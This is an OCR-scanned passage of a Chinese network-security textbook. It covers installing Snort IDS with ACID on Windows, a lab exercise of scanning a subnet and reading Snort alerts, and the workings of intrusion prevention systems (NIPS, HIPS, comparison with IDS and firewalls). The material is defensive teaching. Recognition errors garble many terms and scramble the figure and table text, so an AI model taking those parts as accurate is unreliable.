在 文件 中 ,同时 将 生成 的 警告 信息 发 送 到 SNMP 管理 器 ,这 种 方式 使 得 用 户 面 对 大 量 的 日 
志和 警告 信息 。 

第 二 种 方式 ,用 户 不 但 可 以 将 入侵 检测 数据 保存 到 数据 库 中 ,而 且 可 以 利用 工具 对 入 侵 
检测 的 数据 进行 分 析 。 

搭建 Snort IDS for Windows 平台 需要 以 下 软件 及 其 版 本 ,可 以 用 高 级 版 本 (Linux 下 
请 使 用 for linux 版 本 ): 
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(1) apache_2.0.63_win32: Windows 版 本 的 apache Web 服务 器 。 

(2) PHP_4. 3.2_win32: 作为 Web 服务 器 和 MySQL 数据 库 之 间 的 接口 。 

(3) snort_2. 0.0_win32: 人 侵 检测 软件 Snort。 

(4) mysql_4.0.23_win32: 用 来 存放 Snort 产生 的 警告 信息 ,也 可 以 使 用 Oracle 等 数 
据 库 。 

(5) adodb465: ACID 用 来 连接 MySQL 数据 库 。 

(6) acid_0. 9. 6b23: 一 个 用 PHP 编写 的 分 析 控 制 台 ,用 来 查看 和 分 析 snort 产生 的 人 
侵 检 测 数 据 。 

(7) jpgraph_1. 26: 用 于 生成 Snort 产生 的 人 侵 检测 数据 的 统计 图 形 。 

(8) winpcap_3.2: 用 于 信息 包 捕 获 和 网 络 分 析 , 安 装 Snort 所 必需 的 软件 包 。 

安装 步骤 ; 首先 安装 apache_2. 0. 63 For Windows, 添 加 Apache 对 PHP 的 支持 ,启动 
Apache 服务 ;再 安装 Snort 2. 0. 0 与 winpcap ,安装 .配置 MySQL 数据 库 ;安装 adodb ,acid 
和 jpgraph-1. 26. tar. gz; 最 后 配置 Snort。 

使 用 Snort 的 嗅 探 模式 来 检测 Snort 是 否 安装 成 功 ,使 用 数据 包 记 录 器 模式 来 指定 存 
放 日 志 的 文件 或 文件 夹 , 使 用 检测 模式 来 响应 。 

使 用 扫描 软件 X-Scan 3. 3 扫描 主机 所 在 的 网 段 ,打开 acid 检测 控制 台 主 界面 http:// 
127. 0.0.1:8080/acid/acid_main. php, 就 可 以 查看 TCP、UDP 和 ICMP 协议 的 详细 日 志 情 
况 , 单 击 alert 后 面 的 数字 (特殊 的 流量 记录 ) ,可 能 就 是 某 种 攻击 ,如 图 11. 20 所 示 。 


payload critera ED 。 Source Port: TCP | UDP 
» Destination Port TCP | UDP 
le Time profile of alerts 
Displaying alerts 1.50 of 268 tota 
Layer 
Source Dest 
nm ID Signature Timestamp Address Address 
口 #0{2- [snort] (snort_decodef Imvalid UDP header, length fald < 2008.0823 。。 221.205.36.34.1078 UDP 
0) 8 17:27.48 202.119.201.73:26541 
加 {2- urlsnort] SCAN SOCKS Proxy attempt 2008.0825 202.119.201.78.8694 202.119.201.73:1080 TCP 
6) 09:09:18 
口 #2(2. [snort] SCAN Squid Proxy attempt 2008-08.25 202119.201.733128 TCP 
n 09.0918 202.119.201.78:10742 
口 ” 权 {2 [snort] SCAN Proxy (8080) attempt 2008-08.25 202.119.201.73:8080 TCP 
8) 09.0819 202.11920178:15694 
口 Mt2， [snordl P2P GNUTala GET 2008-08:25 202.119.201.78:1048 20211920173.139 。 TCP 
引 090926 


图 11.20 acid 检测 控制 台 的 alert 


11.6 人 侵 防 御 系 统 


和信 侵 防 御 系 统 (Intrusion Prevention System, IPS), 有 时 又 称 为 入 侵 检 测 和 防御 
(Intrusion detection and Prevention ,IDP) , 指 具 备 IDS 的 检测 能 力 , 同 时 在 线 部 署 在 网 络 
中 ,具备 实时 中 止 网 络 入侵 的 安全 技术 设备 。 它 是 近年 来 新 兴 的 一 种 网 络 安全 产品 。 它 是 
由 和 人 侵 检测 系统 发 展 而 来 , 兼 有 防火 墙 的 一 部 分 功能 。 一 般 分 为 基于 主机 的 和 人 侵 防御 系统 
(Host-based Intrusion Prevention System, HIPS) 和 基于 网 络 的 入 侵 防 御 系 统 (Network- 
based Intrusion Prevention System,NIPS) 。 


从 功能 上 讲 ,IPS 是 传统 防火 墙 和 入 侵 检测 系统 的 组 合 , 它 对 入 侵 检测 模块 的 检测 结果 
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进行 动态 响应 ,将 检测 出 的 攻击 行为 在 位 于 网 络 出 入 口 的 防火 墙 模块 上 进行 阻 断 。 但 IPS 
并 不 是 防火 墙 和 入 侵 检测 系统 的 简单 组 合 , 它 是 一 种 有 取舍 地 吸取 了 防火 墙 和 入 侵 检测 系 
统 功能 的 一 个 新 产品 ,其 目的 是 为 网 络 提供 深层 次 的 、 有 效 的 安全 防护 。 一 般 分 为 基于 网 络 
的 入侵 防御 系统 和 基于 主机 的 入 侵 防 御 系 统 。 


11.6.1 入 侵 防 御 系 统 的 由 来 


计算 机 用 户 面临 的 病毒 /木马 及 恶意 代码 .垃圾 邮件 、 网 络 蠕虫 等 恶意 代码 技术 越 来 越 
先进 ,攻击 的 范围 .手段 和 时 间 变 化 越 来 越 大 ,广泛 的 Web 应 用 、P2P 应 用 和 分 布 式 应 用 隐 
患 层出不穷 ,人 工 响应 基本 不 再 可 能 。 传 统 的 防火 墙 和 IDS 系统 无 法 满足 完全 安全 需求 。 

防火 墙 是 实施 访问 控制 策略 的 系统 ,对 流 经 的 网 络 流量 进行 检查 ,拦截 不 符合 安全 策略 
的 数据 包 。 传 统 的 防火 墙 旨 在 拒绝 那些 明显 可 疑 的 网 络 流量 ,但 仍然 允许 某 些 流量 通过 , 因 
此 防火 墙 对 于 很 多 入 侵 攻击 仍然 无 计 可 施 。 

IDS 通过 监视 网 络 或 系统 资源 ,寻找 违反 安全 策略 的 行为 或 攻击 迹象 ,并 发 出 报警 。 
IDS 的 主要 功能 为 人 侵 检测 ,只 能 事后 响应 (需要 一 定 的 响应 时 间 ) ,不 能 及 时 响应 攻击 。 绝 
大 多 数 IDS 系统 都 是 被 动 的 ,而 不 是 主动 的 。 也 就 是 说 ,在 攻击 实际 发 生 之 前 ,它们 往往 无 
法 预先 发 出 警报 。 与 防火 墙 联动 的 阻 断 操作 耗费 的 时 间 对 于 现代 的 网 络 是 一 个 巨大 的 时 间 
窗口 ,蠕虫 病毒 等 可 能 已 经 完成 攻击 ,不 能 实现 完全 阻 断 , 只 能 提供 TCP 攻击 的 阻 断 ,对 于 
UDP 攻击 无 能 为 力 ; 对 未 知 的 攻击 束手无策 ;无 法 实时 阻止 应 用 层 威胁 。 而 且 当 IDS 检测 
到 异常 并 向 管理 员 发 出 警报 ,管理 员 查 找 众 多 的 异常 通信 若 有 很 多 错误 的 报告 ,管理 员 会 产 
生 时 间 疲 劳 和 厌烦 ,可 能 忽略 IDS 系统 的 警告 ;对 于 合法 的 网 络 通 信 如 果 报 告 错误 并 阻 断 ， 
会 影响 应 用 。 同 时 IDS 的 检查 特征 库 需 要 不 断 更 新 ,以 适应 新 的 攻击 检测 。 

为 了 在 检测 的 同时 及 时 、 精 准 地 阻 断 攻击 ,入 侵 防御 系统 (IPS) 应 运 而 生 。IPS 与 IDS 
类 似 , 但 是 IPS 在 设计 上 解决 了 IDS 的 一 些 缺陷 。 如 果 检 测 到 攻击 ,IDS 只 是 在 网 络 之 外 起 
到 报警 的 作用 ,而 IPS 会 在 这 种 攻击 扩散 到 网 络 的 其 他 地 方 之 前 阻止 这 个 恶意 的 通信 ,起 到 
主动 防御 的 作用 。 


11.6.2 入 侵 防 御 系 统 原理 


IPS 实现 实时 检查 和 阻止 入 侵 的 原理 在 于 IPS 拥有 数目 众多 的 过 滤器 ,能 够 防止 各 种 
攻击 。 当 新 的 攻击 手段 被 发 现 之 后 ,IPS 就 会 创建 一 个 新 的 过 滤器 。IPS 数据 包 处 理 引擎 
是 专业 化 定制 的 集成 电路 ,可 以 深层 检查 数据 包 的 内 容 。 如 果 有 攻击 者 利用 链 路 层 (介质 访 
问 控制 ) 至 应 用 层 的 漏洞 发 起 攻击 ,IPS 能 够 从 数据 流 中 检查 出 这 些 攻击 并 加 以 阻止 。IPS 
可 以 做 到 逐一 字 节 地 检查 数据 包 , 所 有 流 经 IPS 的 数据 包 都 按照 报头 信息 分 类 ,如 源 IP 地 
址 和 目的 IP 地 址 、 端 口号 和 应 用 域 ,每 种 过 滤器 负责 分 析 相 对 应 类 型 的 数据 包 , 包 含 恶意 内 
容 的 数据 包 就 会 被 丢弃 ,被 怀疑 的 数据 包 需 要 接受 进一步 的 检查 。 

针对 不 同 的 攻击 行为 ,IPS 需要 不 同 的 过 滤器 。 每 种 过 滤器 都 设 有 相应 的 过 滤 规则 ,为 
了 确保 准确 性 ,这 些 规则 的 定义 非常 广泛 。 在 对 传输 内 容 进 行 分 类 时 ,过滤 引 擎 还 需要 参照 
数据 包 的 信息 参数 ,并 将 其 解析 至 一 个 有 意义 的 域 中 进行 上 下 文 分 析 , 以 提高 过 滤 准 确 性 。 

过 滤器 引擎 集合 了 流水 线 技术 和 大 规模 并 行 处 理 硬件 技术 ,能 够 同时 执行 数 千 次 的 数 
据 包 过 滤 检 查 。 并 行 过 滤 处 理 可 以 确保 数据 包 能 够 不 间断 地 快速 通过 系统 ,不 会 对 速度 造 
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成 影响 。 硬 件 加速 技 术 对 于 IPS 具有 重要 意义 ,因为 串 行 过 滤 检 查 会 导致 系统 性 能 降低 。 
IPS 原理 如 图 11. 21 所 示 。 


入 侵 防护 系统 (IPS) 
"工作 原理 入 侵 防护 系统 可 以 对 数据 包 进 行 检查 并 阻止 恶意 内 容 的 前 进 ， 
从 而 阻止 网 络 攻击 活动 。 


IPS 引 擎 


大 规模 并 行 深层 检查 ASIC 
一 | 过 滤器 1 ~ (命中? ] 
| -| 过 滤器 2 二 | 命中 ? 各 4 天 人 一 一 _ 
— 过 滤器 3 (fe ] 未 通过 


千 


E=Id 
丢弃 


[ 流 状 态 信息 | | 一 ~ 过 滤器 N =| 命中 ? 


a 根据 报关 和 流 。” @@ 根据 数据 包 的 分 类 ， ”@ 所 有 相关 过 滤器 都 是 @ 被 标 为 命中 的 数据 包 将 
信息 ， 每 个 数据 。 相关 的 过 滤器 将 使 用 并 行使 用 的 ， 如 果 任 被 丢弃 ， 与 之 相关 的 流 
包 都 会 被 分 类 。 于 检查 数据 包 的 流 状 何 数据 包 符合 匹配 要 ”状态 信息 也 会 更 新 ， 指 

求 ， 则 该 数据 包 将 被 。” 示 系 统 丢弃 该 流 中 删除 

标 为 命中 。 的 所 有 内 容 。 


图 11.21 IPS 原理 


态 信息 。 


IPS 具有 的 技术 特征 如 下 : 

(1) 和 能 入 式 运行 。 只 有 以 嵌入 模式 运行 的 IPS 设备 才能 够 实现 实时 的 安全 防护 ,实时 
阻拦 所 有 可 疑 的 数据 包 ,并 对 该 数据 流 的 剩余 部 分 进行 拦截 。 

(2) 深入 分 析 和 控制 。IPS 必须 具有 深入 分 析 能 力 ,以 确定 哪些 恶意 流量 已 经 被 拦截 ， 
根据 攻击 类 型 .策略 等 来 确定 哪些 流量 应 该 被 拦截 。 

(3) 入 侵 特征 库 。 高 质量 的 入 侵 特 征 库 是 IPS 高 效 运行 的 必要 条 件 ,IPS 还 应 该 定期 
升级 入 侵 特征 库 ,并 快速 应 用 到 所 有 传感器 。 

(4) 高 效 处 理 能 力 。IPS 必须 具有 高 效 处 理 数据 包 的 能 力 ,对 整个 网 络 性 能 的 影响 保 


持 在 最 低 水 平 。 
11.6.3 基于 网 络 的 入 侵 防御 系统 

网 络 人 侵 防 御 系 统 (NIPS) 与 受 保护 网 段 是 串联 部 署 的 。 受 保护 的 网 段 与 其 他 网 络 之 
间 交 互 的 数据 流 都 必须 通过 NIPS 设备 。 当 检测 到 攻击 时 ,NIPS 丢弃 或 阻 断 含有 攻击 性 的 


数据 ,进而 阻 断 了 攻击 。 

在 技术 上 ,NIPS 吸 取 了 目前 NIDS 所 有 的 成 熟 技术 ,包括 特征 匹配 协议 分 析 和 异常 检 
测 。 特 征 匹配 是 最 广泛 应 用 的 技术 ,具有 准确 率 高 .速度 快 的 特点 。 基 于 状态 的 特征 匹配 不 
但 检测 攻击 行为 的 特征 ,还 要 检查 当前 网 络 的 会 话 状态 ,避免 受到 欺骗 攻击 。 协 议 分 析 充 分 
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利用 网 络 协议 的 高 度 有 序 性 ,并 结合 高 速 数据 包 捕捉 和 协议 分 析 来 快速 检测 某 种 攻击 特征 。 
协议 分 析 能 够 理解 不 同 协议 的 工作 原理 ,以 此 分 析 并 寻找 可 疑 或 不 正常 的 访问 行为 。 协 议 
分 析 不 仅仅 基于 协议 标准 (如 RFC) ,还 基于 协议 的 具体 实现 ,这 是 因为 很 多 协议 的 实现 可 
能 偏离 了 协议 标准 。 通 过 协议 分 析 ,IPS 能 够 针对 插入 (Insertion) 与 规避 (Evasion) 攻 击 进 
行 检 测 。 异 常 检测 的 误 报 率 比较 高 ,NIPS 不 将 其 作为 主要 技术 。 

由 于 实时 在 线 ,NIPS 需要 具备 很 高 的 性 能 ,以 免 成 为 网 络 的 瓶颈 ,因此 NIPS 通常 被 设 
计 成 类 似 于 交换 机 的 网 络 设备 ,提供 线 速 知 吐 速率 以 及 多 个 网 络 端 口 。NIPS 必须 基于 特 
定 的 硬件 平台 ,才能 实现 千 兆 级 网 络 流量 的 深度 数据 包 检 测 和 阻 断 功能 。 这 种 特定 的 硬件 

台 通 常 可 以 分 为 三 类 : 网 络 处 理 器 (网 络 芯片 ) .专用 的 FPGA 编程 芯片 和 专用 的 ASIC 

芯片 。 目 前 发 展 为 使 用 GPU 加 速 处 理 。 

NIPS 需要 具备 极 高 的 精确 性 ,因为 攻击 的 误 报 将 导致 合法 的 通信 被 阻 断 , 也 就 是 可 能 
出 现 拒绝 服务 的 情形 。 

NIPS 具有 如 下 优点 : 

(1) 单个 通信 (流量 ) 控 制 点 可 以 保护 成 千 的 位 于 NIPS 下 面 的 系统 。 

(2) NIPS 设备 像 单个 探测 器 (Sensor) 易 于 部 署 ,可 以 保护 成 百 上 千 的 系统 。 部 署 几 个 
或 几 十 个 探测 器 比 在 成 百 上 千 的 系统 上 安装 软件 要 省 去 多 得 多 的 时 间 和 精力 。 

(3) 提供 一 个 更 宽 的 视野 ,可 以 发 现 威胁 情形 ,例如 扫描 ,探测 、 攻 击 基于 非 单一 系统 的 
设备 。 

(4) 保护 非 计算 机 类 的 网 络 设备 。 

(5) 与 平台 无 关 。NIPS 可 以 保护 所 有 设备 ,不 管 是 什么 操作 系统 或 应 用 程序 。 

(6) 防止 网 络 拒绝 服务 攻击 、 分 布 式 拒绝 服务 攻击 ` 面 向 带宽 的 攻击 和 同步 洪水 (SYN 
Flood) 攻 击 等 。 


11.6.4 基于 主机 的 入 侵 防御 系统 


基于 主机 的 入侵 防御 系统 (HIPS) 是 直接 安装 在 正 受 保护 的 机 器 上 的 代理 (程序 ) ,检测 
并 阻挡 针对 本 机 的 威胁 和 攻击 。 它 与 操作 系统 内 核 紧 密 捆 绑 在 一 起 ,监视 和 窃听 APIs 或 
到 内 核 的 系统 调用 ,阻挡 攻击 ,并 记录 日 志 。 

HIPS 可 以 根据 自 定义 的 安全 策略 以 及 分 析 学 习 机 制 来 阻 断 对 服务 器 ,主机 发 起 的 亚 
意 人 侵 。HIPS 可 以 阻 断 缓冲 区 溢出 改变 登录 口令 ` 改 写 动 态 链接 库 以 及 其 他 试图 从 操作 
系统 夺取 控制 权 的 入 侵 行为 ,整体 提升 主机 的 安全 水 平 。 

在 技术 上 ,HIPS 采用 独特 的 服务 器 保护 途径 ,利用 包 过 滤 、 状 态 包 检 测 和 实时 入侵 检 
测 组 成 分 层 防护 体系 。 这 种 体系 能 够 在 提供 合理 吞吐 率 的 前 提 下 ,最 大 限度 地 保护 服务 器 
的 敏感 内 容 , 既 可 以 以 软件 形式 嵌入 到 应 用 程序 对 操作 系统 的 调用 当中 ,通过 拦截 针对 操作 
系统 的 可 疑 调用 ,提供 对 主机 的 安全 防护 ;也 可 以 以 更 改 操作 系统 内 核 程 序 的 方式 ,提供 比 
操作 系统 更 加 严谨 的 安全 控制 机 制 。 

由 于 HIPS 工作 在 受 保护 的 主机 /服务 器 上 , 它 不 但 能 够 利用 特征 和 行为 规则 检测 , 阻 
止 诸 如 缓冲 区 溢出 之 类 的 已 知 攻 击 , 还 能 够 防范 未 知 攻击 ,防止 针对 Web 页 面 . 应 用 和 资源 
的 未 授权 的 任何 非法 访问 。 

HIPS 与 具体 的 主机 /服务 器 操作 系统 平台 紧密 相关 ,不 同 的 平台 需要 不 同 的 软件 代理 
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程序 。 它 监视 针对 某 一 特殊 应 用 的 数据 流 和 环境 变化 ,例如 Web 服务 器 的 文件 位 置 及 注册 
表 设 置 ,保护 应 用 程序 免 受 那些 目前 还 没有 特征 的 攻击 。 进 出 这 个 特殊 系统 的 通信 和 应 用 
程序 .操作 系统 的 行为 将 被 监视 和 检查 ,判断 其 是 否 存在 攻击 迹象 。HIPS 不 仅 可 以 保护 操 
作 系 统 , 还 可 以 保护 在 其 上 运行 的 应 用 程序 ,例如 Web 服务 器 。 当 检测 到 攻击 , HIPS 或 在 
网 络 接口 层 阻 断 攻击 ,或 者 向 应 用 程序 或 操作 系统 发 出 命令 ,停止 攻击 所 引起 的 行为 。 通 过 
拦截 和 拒绝 IE 发 出 的 写 文件 命令 ,可 以 阻挡 攻击 者 试图 通过 IE 这 样 的 应 用 程序 安装 后 门 
程序 。 

HIPS 具有 如 下 优点 : 

(1) 软件 直接 安装 在 系统 上 ,可 以 保护 系统 免 受 攻击 ,例如 阻 断 程序 写 文件 ,阻止 用 户 
特权 的 升级 。 

(2) 当 移 动 系统 依附 在 受 保护 网 络 的 外 部 时 ,保护 它们 免 受 攻击 。 

(3) 保护 系统 免 受 本 地 攻击 。 

(4) 对 逃 过 其 他 安全 工具 检测 的 攻击 提供 最 后 一 道 防线 。 

(5) 防止 相同 网 段 上 的 系统 、 设 备 免 受 内 部 攻击 或 滥用 ,而 NIPS 只 能 保护 在 不 同 网 段 
间 移动 的 数据 。 

(6) 受 保护 系统 正 是 加 密 数 据 流 的 终点 ,可 以 保护 系统 免 受 加 密 的 攻击 。 

(7) HIPS 独立 于 网 络 体系 结构 。 

HIPS 的 缺点 就 是 与 主机 的 操作 系统 必须 紧 紧 地 集成 在 一 起 ,一 旦 操作 系统 升级 ,将 会 
带 来 问题 : 消耗 系统 资源 。 


11.6.5 IPS 与 IDS 比较 


2004 年 ,Gartner 的 报告 曾经 预言 IDS 即将 死亡 ,但 无 论 从 用 户 的 需求 还 是 从 厂商 的 产 
品 销售 来 看 ,IDS 依然 处 于 旺盛 的 需求 阶段 ,事实 证 明 IDS 即将 死亡 的 论断 是 错误 的 。 

IDS IPS 和 防火 墙 比较 如 表 11. 3 所 示 。IDS 和 IPS 分 属 两 种 不 同 产品 领域 ,前 者 是 一 
种 检测 技术 ,而 后 者 是 一 种 阻 断 技术 ,只 不 过 后 者 阻 断 攻击 的 依据 是 检测 。 从 理论 上 看 ,用 
户 首先 要 查找 到 风险 ,才能 预防 和 阻 断 风 险 。IDS 是 查找 和 评估 风险 的 设备 ,是 帮助 用 户 自 
我 评估 、 自 我 认 知 的 设备 ;IPS 是 阻 断 风 险 、 改 善 控制 环境 的 设备 ,防火 墙 只 能 做 网 络 层 的 风 
险阻 断 ,不 能 做 到 应 用 层 的 风险 阻 断 。 


表 11.3 IDS、IPS 和 防火 墙 比 较 
IDS 防 火 墙 IPS 


高 性 能 (高 吞吐 量 、 低 延 时 ), 需 
硬件 加 速 ,性 能 上 可 以 达到 线 
速 ;精确 阻 断 、 实 时 阻 断 


实时 检测 与 阻 断 。 


产品 要 求 ”| 准确 检测 ,报警 。 基 于 X86 架构 主要 为 X86 架构 


中 名 I 、 

旁 路 ,IDS 部 署 在 各 交换 机 旁 对 网 es 直接 ,IPS 在 出 口 处 .核心 网 关 
络 进行 状态 监视 公 吕 全 信和 入 。 | 处 进行 人 侵 防 和 
侧重 于 风险 管理 ,网 络 监控 ,注重 | 二 机 工作 在 网 络 | 全 和 风险 控制 .入侵 防御 ,对 网 
攻击 防御 | 安全 审计 ,适合 对 网 络 安全 状态 的 | 训 术 在 防御 | 络 净化 ,核心 在 防御 工作 在 
了 解 ,核心 在 检测 。 工 作 在 7 层 ” 7 层 


部 署 方 式 
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续 表 
IDS 防 火 墙 IPS 
规则 特征 库 | 特征 库 规则 库 规则 库 十 特征 库 


检测 方法 同 IDS, 对 那些 被 明 
确 判 断 为 攻击 的 行为 ,会 对 网 
络 \ 数 据 造成 危害 的 恶意 行为 
进行 检测 和 防御 


响应 方法 “| 报警 阻 断 精确 阻 断 


对 那些 异常 的 .可 能 是 入 侵 行为 的 
检测 方法 “| 数据 进行 检测 和 报警 。 分 为 异常 | 与 规则 库 匹 配 
检测 和 误 用 检测 。 


IDS 呈现 的 攻击 越 全 面 越 好 。IPS 必须 精确 阻 断 、 防 御 及 时 、 高 性 能 、 高 效率 。 

IDS 呈现 的 事件 可 能 只 需要 告警 而 不 需要 阻 断 。IDS 和 IPS 的 特征 库 、 事 件 库 有 着 本 
质 的 区 别 , 是 完全 不 同 的 。IPS 和 IDS 资源 消耗 的 重点 不 一 样 ,IPS 需要 存储 、 分 析 、 转 发 的 
过 程 ,IDS 关注 的 是 检测 事件 并 有 效 、 清 晰 地 呈现 给 用 户 问题 ,让 用 户 找到 改进 的 办 法 。 

IPS 系统 一 般 依靠 对 入 网 数据 包 的 检测 ,经 过 检查 确认 其 中 不 包含 异常 活动 或 可 疑 内 
容 后 ,再 通过 另外 一 个 端口 将 它 传送 到 内 部 系统 中 。 而 IDS 检测 进出 网 络 的 数据 包 。 

IDS IPS 和 防火 墙 可 以 一 起 部 署 工作 ,如 图 11. 22 所 示 。2004 年 9 月 ,IDC 首 度 提出 
“统一 威胁 管理 ”的 概念 ,即将 防 病 毒 、 入 侵 检测 和 防火 墙 安全 设备 划 归 统一 威胁 管理 
(Unified Threat Management, UTM) 新 类 别 。 


Firewall Router 


Switch Switch 
Dp ; 下 


IPS Sensor 


Management 
Server 
Corporate 
Network 
WWW DNS 
Server Server 


图 11.22 NIDS\IPS 与 防火 墙 一 起 协作 部 署 


IPS 技术 需要 面 对 很 多 挑战 ,其 中 主要 有 三 点 : 一 是 单 点 故障 ,二 是 性 能 瓶颈 ,三 是 误 
报 和 漏 报 。IPS 设备 单 点 故障 会 严重 影响 网 络 的 正常 运转 ,甚至 造成 拒绝 服务 。 瓶 颈 问题 
增加 滞后 时 间 , 而 且 会 降低 网 络 的 效率 , 绝 大 多 数 高 端 IPS 产品 都 通过 使 用 硬件 (FPGA、 网 
络 处 理 器 和 ASIC 芯片 ) 来 提高 处 理 速度 。 如 果 入 侵 特 征 编写 得 不 是 十 分 完善 , 误 报 率 和 漏 
报 率 就 会 高 , 阻 断 可 疑 数据 流 时 对 同一 客户 的 正常 数据 流 也 阻 断 。 一 般 采 用 多 种 综合 检测 
技术 ,也 可 能 旁 路 检测 。 
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IPS 的 不 足 并 不 会 成 为 阻止 人 们 使 用 IPS 的 理由 ,因为 安全 功能 的 融合 是 大 势 所 趋 , 入 
侵 防 护 顺应 了 这 一 潮流 。 采 用 IPS 不 失 为 一 种 应 对 攻击 的 理想 选择 。 


本 章 小 结 


试图 破坏 信息 系统 的 完整 性 .机密 性 、 可 信 性 的 任何 网 络 活动 都 称 为 网 络 入 侵 。 防 火 墙 
只 是 一 种 被 动 防御 性 的 网 络 安全 工具 ,审计 是 确定 和 保持 系统 活动 中 每 个 人 的 责任 ,监测 系 
统 的 问题 区 域 。 入 侵 有 以 下 6 种 方式 : 尝试 性 攻击 ,伪装 攻击 ,安全 控制 系统 渗透 、 泄 漏 . 拒 
绝 服 务 和 恶意 使 用 。 

入 侵 检 测 是 一 种 主动 的 计算 机 系统 安全 防御 措施 。 入 侵 检测 是 对 系统 的 运行 状态 进行 
监视 ,识别 和 发 现 各 种 攻击 企图 或 行为 ,从 系统 运行 过 程 中 产生 的 或 系统 所 处 理 的 各 种 数据 
中 查找 出 威胁 系统 安全 的 因素 ,并 对 威胁 做 出 相应 的 处 理 , 以 保证 系统 资源 的 机 密 性 、 完 整 
性 和 可 用 性 。 

入 侵 检测 系统 (Intrusion Detection System,IDS) 是 识别 针对 计算 机 系统 和 网 络 的 非法 
攻击 和 入 侵 的 安全 防御 系统 。 可 以 检测 包括 外 界 非法 入 侵 者 的 恶意 攻击 或 试探 ,以 及 内 部 
合法 用 户 的 超越 使 用 权限 的 非法 行动 ,并 做 出 适当 的 报警 (或 阻 断 ) 等 响应 ,以 便 堵塞 漏洞 和 
修复 系统 。IDS 是 辅助 进行 人 侵 检 测 或 者 独立 进行 人 侵 检测 的 软件 与 硬件 组 合 ,是 防火 墙 
之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,提供 对 内 部 攻击 、 
外 部 攻击 和 误 操 作 的 实时 保护 。 一 般 并 不 严格 区 分 人 侵 检测 与 IDS。 

入 侵 检测 系统 一 般 根据 信息 源 分 为 基于 主机 的 HIDS 和 基于 网 络 的 NIDS ,根据 数据 分 
析 方 法 分 为 异常 人 侵 检 测 系统 和 误 用 入 侵 检 测 系 统 。 

入 侵 检测 系统 处 理 的 基本 流程 包括 数据 收集 、 数 据 分 析 和 处 理 响 应 。 其 基本 结构 包括 
信息 收集 器 ,分 析 器 数据 库 、 目 录 服 务 器 和 响应 。 其 中 信息 收集 器 ,分 析 器 和 事件 数据 库 构 
成 探测 器 (Sensor) 或 引擎 ;目录 服务 器 、 策 略 数 据 库 和 响应 构成 IDS 的 控制 台 。IDS 探测 器 
具有 读 取 原 始 数 据 \ 特 征 提取 与 匹配 策略 执行 .产生 事 件 等 功能 ,控制 台 具 有 事件 读 取 、 显 
示 与 分 析 、 策 略 定制 响应 处 理 等 功能 。 

入 侵 检测 数据 分 析 的 方法 有 特征 的 模式 匹配 ,统计 分 析 、 专 家 系统 和 静态 配置 完整 性 分 
析 。 入 侵 检测 的 方法 有 异常 检测 和 误 用 检测 。 入 侵 检 测 模 型 有 Denning 通用 模型 .IDES 模 
型 .CIDF 模型 和 DIDS 模型 等 。 

入侵 检测 实现 包括 基于 主机 的 IDS、 基 于 网 络 的 NIDS、 基 于 应 用 的 IDS、 基 于 Agent 的 
IDS 和 分 布 式 DIDS 等 。 

蜜 饶 是 一 种 网 络 攻击 诱骗 工具 ,是 一 个 包含 有 漏洞 的 诱骗 系统 , 它 通过 模拟 一 个 或 多 个 
易 受 攻击 的 主机 ,给 攻击 者 提供 一 个 容易 攻击 的 目标 系统 。 蜜 饶 的 实现 主要 有 空 系统 、 镜 像 
系统 和 虚拟 系统 三 种 。 蜜 网 (Honey Net) 技 术 也 称 为 陷阱 网 络 技术 , 它 由 多 个 蜜 镀 主机 、 路 
由 器 防火墙 IDS 和 审计 系统 等 组 成 。 

Snort 是 一 款 轻 量 级 的 网 络 人 侵 检测 系统 ,能 够 在 IP 网 络 上 进行 实时 的 流量 分 析 和 数 
据 包 记录 。 

入 侵 防御 系统 (IPS) 有 时 又 称 为 IDP, 指 具备 IDS 的 检测 能 力 , 同 时 在 线 部 署 在 网 络 中 ， 
具备 实时 中 止 网 络 人 侵 的 安全 技术 设备 。IPS 拥有 数目 众多 的 过 滤器 ,能 够 实时 在 线 检测 
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和 精准 阻 断 各 种 攻击 。IPS 系统 包含 防火 墙 和 入 侵 检 测 两 大 功能 模块 ,一 般 分 为 基于 网 络 
的 NIPS 和 基于 主机 的 HIPS。 


习 题 11 


11.1 用 Snort 实现 IDS for Windows, 对 其 进行 扫描 ,攻击 等 实验 ,查看 人 侵 检测 系统 的 反 
应 ,并 编写 实验 报告 。 

和 人 侵 检测 系统 有 哪些 可 以 利用 的 数据 源 ? 

试 构造 一 个 网 络 数据 包 的 截获 程序 。 

试 述 入 侵 检 测 系 统 的 工作 原理 。 

收集 资料 ,对 国内 外 主要 基于 网 络 的 入 侵 检测 产品 进行 比较 。 

收集 资料 ,对 国内 外 主要 基于 主机 的 和 人 侵 检测 产品 进行 比较 。 

简 述 蜜 摊 技术 的 特殊 用 途 。 用 下 载 的 蜜 护 工具 构造 一 个 简单 的 蜜 把 系统 。 
什么 是 人 侵 防御 系统 ? 它 与 IDS 有 何 区别 ? 


11. 
11. 
了 
Il: 
1 
1 
1 


[> 
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12.1 计算 机 犯罪 


1. 计算 机 犯罪 概念 

广义 上 说 ,计算 机 犯罪 通常 是 指 所 有 涉及 计算 机 的 犯罪 。 如 欧洲 经 济 合作 与 发 展 组 织 
的 专家 认为 :“ 在 自动 数据 处 理 过 程 中 任何 非法 的 .违反 职业 道德 的 ,未 经 过 批准 的 行为 都 
是 计算 机 犯罪 "我国 刑法 学 者 认为 :“ 凡 是 故意 或 过 失 不 当 使 用 计算 机 致使 他 人 受 损失 或 
有 受 损 失 危 险 的 行为 都 是 计算 机 犯罪 。” 

狭义 上 说 ,计算 机 犯罪 通常 是 对 计算 机 资产 本 身 进行 侵犯 的 犯罪 。 例 如 ,瑞典 的 私人 保 
密 权 法 规定 :“ 未 经 过 批准 建立 和 保存 计算 机 私人 文件 ,非法 窃取 电子 数据 处 理 记 录 或 非法 
自 改 ,删除 记录 侵犯 个 人 隐私 的 行为 都 是 计算 机 犯罪 ”德国 学 者 施 奈 德 认为 : “计算机 犯罪 
指 的 是 利用 电子 数据 处 理 设备 作为 作案 工具 的 犯罪 行为 或 者 把 数据 处 理 设备 当 作 作案 对 象 
的 犯罪 行为 ”我 国有 学 者 认为 “计算 机 犯罪 是 指 利 用 计算 机 操作 所 实施 的 危害 计算 机 信息 
系统 资产 (包括 内 存 数 据 及 程序 ) 安 全 的 犯罪 行为 。” 

通常 定义 ,计算 机 犯罪 是 以 计算 机 或 网 络 为 工具 对 计算 机 系统 资产 .网 络 信息 安 全 进行 
侵犯 的 犯罪 行为 。 

2. 计算 机 犯罪 的 特点 

